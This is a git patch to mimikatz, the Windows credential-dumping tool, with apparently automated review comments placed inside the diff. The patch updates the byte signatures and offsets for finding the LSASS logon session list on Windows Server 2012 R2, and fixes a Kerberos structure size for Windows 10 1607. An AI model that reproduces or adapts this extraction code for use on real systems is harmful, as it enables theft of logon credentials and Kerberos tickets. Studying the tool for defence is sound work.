From 57f410156754ebb00a788bae13087bd5f7274ad1 Mon Sep 17 00:00:00 2001
From: Benjamin DELPY
Date: Wed, 5 Oct 2016 21:37:29 +0300
Subject: [PATCH] [fix #65] mimikatz sekurlsa::* for old 2012r2 version [fix #66] mimikatz sekurlsa::kerberos CSP/Pin data for Windows 10 1607
---
 inc/globals.h | 2 +-
 mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c | 4 ++--
 mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c | 2 +-
 3 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/inc/globals.h b/inc/globals.h
index ac047c6..293ce5b 100644
--- a/inc/globals.h
+++ b/inc/globals.h
@@ -32,7 +32,7 @@
 #define MIMIKATZ_VERSION L"2.1"
 #define MIMIKATZ_CODENAME L"A La Vie, A L\'Amour"
 #define MIMIKATZ_FULL MIMIKATZ L" " MIMIKATZ_VERSION L" (" MIMIKATZ_ARCH L") built on " TEXT(__DATE__) L" " TEXT(__TIME__)
-#define MIMIKATZ_SECOND L"\"" MIMIKATZ_CODENAME L"\" - CQURE Edition"
+#define MIMIKATZ_SECOND L"\"" MIMIKATZ_CODENAME L"\""
 #define MIMIKATZ_SPECIAL L" "
 #define MIMIKATZ_DEFAULT_LOG MIMIKATZ L".log"
 #define MIMIKATZ_DRIVER L"mimidrv"
diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
index 9c2a2eb..bf389bc 100644
--- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
+++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa_utils.c
@@ -9,7 +9,7 @@
 BYTE PTRN_WIN5_LogonSessionList[] = {0x4c, 0x8b, 0xdf, 0x49, 0xc1, 0xe3, 0x04, 0x48, 0x8b, 0xcb, 0x4c, 0x03, 0xd8};
 BYTE PTRN_WN60_LogonSessionList[] = {0x33, 0xff, 0x45, 0x85, 0xc0, 0x41, 0x89, 0x75, 0x00, 0x4c, 0x8b, 0xe3, 0x0f, 0x84};
 BYTE PTRN_WN61_LogonSessionList[] = {0x33, 0xf6, 0x45, 0x89, 0x2f, 0x4c, 0x8b, 0xf3, 0x85, 0xff, 0x0f, 0x84};
-BYTE PTRN_WN63_LogonSessionList[] = {0x33, 0xff, 0x45, 0x89, 0x34, 0x24, 0x4c, 0x8b, 0xfb, 0x45, 0x85, 0xc0, 0x74};
+BYTE PTRN_WN63_LogonSessionList[] = {0x8b, 0xde, 0x48, 0x8d, 0x0c, 0x5b, 0x48, 0xc1, 0xe1, 0x05, 0x48, 0x8d, 0x05};
 BYTE PTRN_WN6x_LogonSessionList[] = {0x33, 0xff, 0x41, 0x89, 0x37, 0x4c, 0x8b, 0xf3, 0x45, 0x85, 0xc0, 0x74};
 KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
 	{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, 0}},
@@ -17,7 +17,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
 	{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WN60_LogonSessionList), PTRN_WN60_LogonSessionList}, {0, NULL}, {21, -4}},
 	{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WN61_LogonSessionList), PTRN_WN61_LogonSessionList}, {0, NULL}, {19, -4}},
 	{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {16, -4}},
-	{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_LogonSessionList), PTRN_WN63_LogonSessionList}, {0, NULL}, {24, -4}},
+	{KULL_M_WIN_BUILD_BLUE, {sizeof(PTRN_WN63_LogonSessionList), PTRN_WN63_LogonSessionList}, {0, NULL}, {36, -6}},
 	{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN6x_LogonSessionList), PTRN_WN6x_LogonSessionList}, {0, NULL}, {16, -4}},
 };
 #elif defined _M_IX86
diff --git a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
index c253476..c6d88f2 100644
--- a/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
+++ b/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c
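Review bot: The two trailing integers on the rewritten `KULL_M_WIN_BUILD_BLUE` row, `{36, -6}` in the second hunk, change together with the `PTRN_WN63_LogonSessionList` bytes in the first hunk, yet nothing in the table says how either value relates to the pattern, so a later reader cannot check the row without repeating whatever derivation produced it. Every row of `LsaSrvReferences` uses the same unexplained positional pair, and the `KULL_M_PATCH_GENERIC` layout that gives the pair its meaning is defined outside this file. A one-line comment on the row recording which 2012 R2 build the bytes were captured from and what the two offsets are measured from would document the fix the commit message only names by issue number, e.g. `/* [fix #65]: <build the bytes came from>; offsets are relative to <reference point> */` with the placeholders filled in by the author. The same comment belongs on the new `PTRN_WN63_LogonSessionList` definition in the first hunk, since the old bytes were replaced rather than annotated.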
@@ -292,7 +292,7 @@ const KERB_INFOS kerbHelper[] = {
 			FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, Tickets_3),
 		},
 		FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION_10_1607, SmartcardInfos),
-		sizeof(KIWI_KERBEROS_LOGON_SESSION_10),
+		sizeof(KIWI_KERBEROS_LOGON_SESSION_10_1607),
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, ServiceName),
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, TargetName),
 		FIELD_OFFSET(KIWI_KERBEROS_INTERNAL_TICKET_10_1607, DomainName),
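Review bot: The corrected line sits inside a long positional initializer of `kerbHelper`, so the struct-name mismatch this commit fixes (`sizeof(KIWI_KERBEROS_LOGON_SESSION_10)` in an entry whose every other field names `..._10_1607`) presumably only showed up at runtime and can be reintroduced just as silently in the next entry. Designated initializers, `.<member> = sizeof(KIWI_KERBEROS_LOGON_SESSION_10_1607)` with the actual `KERB_INFOS` member name (not visible in this hunk) in place of the placeholder, would tie each value to the field it fills and make a stray `_10` stand out in review without changing the table's contents. The `kerbHelper` array begins and ends outside the hunk, so the same treatment would apply to its other entries.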